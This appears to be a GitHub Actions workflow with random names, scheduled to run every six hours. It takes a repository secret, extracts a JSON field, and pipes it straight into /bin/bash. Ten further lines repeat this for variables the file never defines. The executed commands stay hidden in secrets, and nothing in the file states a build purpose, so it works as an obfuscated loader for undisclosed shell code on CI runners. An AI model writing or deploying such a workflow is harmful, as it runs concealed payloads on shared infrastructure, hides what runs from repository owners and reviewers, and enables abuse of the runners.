name: alarmingnecklace
on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: alarmingnecklace
        env:
          bz8639: ${{ secrets.bz8639 }}
        run: |
          echo $bz8639 | jq -r .tnadp1482 | /bin/bash
          echo $rlu2604 | jq -r .anvy54 | /bin/bash
          echo $go135 | jq -r .uzb284 | /bin/bash
          echo $rc513 | jq -r .ii2721 | /bin/bash
          echo $smjv3 | jq -r .xipu56878 | /bin/bash
          echo $wno38 | jq -r .gfjcz0 | /bin/bash
          echo $kwwb402 | jq -r .dwfs88 | /bin/bash
          echo $myt225 | jq -r .noge8369 | /bin/bash
          echo $tm63038 | jq -r .w291 | /bin/bash
          echo $qahd17 | jq -r .rplwk31 | /bin/bash
          echo $uas4 | jq -r .co067 | /bin/bash

